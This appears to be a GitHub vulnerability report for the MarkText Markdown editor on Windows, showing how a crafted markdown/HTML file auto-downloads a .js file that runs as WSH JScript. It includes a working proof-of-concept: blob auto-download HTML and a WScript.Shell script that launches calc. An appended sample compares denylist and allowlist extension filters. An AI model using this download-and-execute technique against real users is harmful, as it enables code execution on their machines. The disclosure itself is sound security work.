Although MarkText filters most dangerous suffixes, it still retains the .js file, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. Users clicking on an evil markdown file may cause code execution.
<!-- auto download !-->
<html>
<script>
var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'], {type: 'application/js'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'poc.js';
a.click();
</script>
</html>
<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
poc.js
var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0) WScript.Echo("You were hacked.");
WScript.Quit();
liyansong2018 changed the title from "Typora on Windows doesn't filter WSH JScript, which may cause code execution" to "MarkText on Windows doesn't filter WSH JScript, which may cause code execution" on Feb 9, 2023
Description
Version: 0.17.1 (latest)
Attachment
poc.md
poc.html
poc.js
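The gap reported above is typical of suffix denylists: a type the list forgets, here .js, passes through. As an added example (not code from this issue or from MarkText), the sketch below compares a denylist with an allowlist after reducing a name to the extension Windows will act on. The list contents and function names are assumptions.

```javascript
// Constructed denylist in the style the report describes: common executable
// suffixes are blocked, but the WSH script suffix .js is missing.
const DENYLIST = new Set(['.exe', '.bat', '.cmd', '.com', '.scr', '.msi', '.ps1', '.vbs']);

// Hypothetical allowlist of the types an editor would save from a document.
const ALLOWLIST = new Set(['.png', '.jpg', '.jpeg', '.gif', '.pdf', '.txt', '.md']);

// Reduce a download name to the extension Windows will use to pick a handler.
function effectiveExtension(fileName) {
  let name = String(fileName).split(/[\\/]/).pop(); // last path component
  name = name.split(':')[0];                         // drop an alternate data stream suffix
  name = name.replace(/[. ]+$/, '');                 // Windows strips trailing dots and spaces
  const dot = name.lastIndexOf('.');
  return dot === -1 ? '' : name.slice(dot).toLowerCase();
}

// Denylist policy: anything not explicitly listed is saved.
function denylistAllows(fileName) {
  return !DENYLIST.has(effectiveExtension(fileName));
}

// Allowlist policy: only explicitly listed types are saved (fails closed).
function allowlistAllows(fileName) {
  return ALLOWLIST.has(effectiveExtension(fileName));
}

// Constructed sample names, including normalisation edge cases.
const samples = ['diagram.PNG', 'poc.js', 'POC.JS. ', 'image.png.js', 'poc.js::$DATA', 'run.EXE'];

function compare(names) {
  return names.map((n) => ({
    name: n,
    ext: effectiveExtension(n),
    denylist: denylistAllows(n) ? 'saved' : 'blocked',
    allowlist: allowlistAllows(n) ? 'saved' : 'blocked',
  }));
}

console.table(compare(samples));
```
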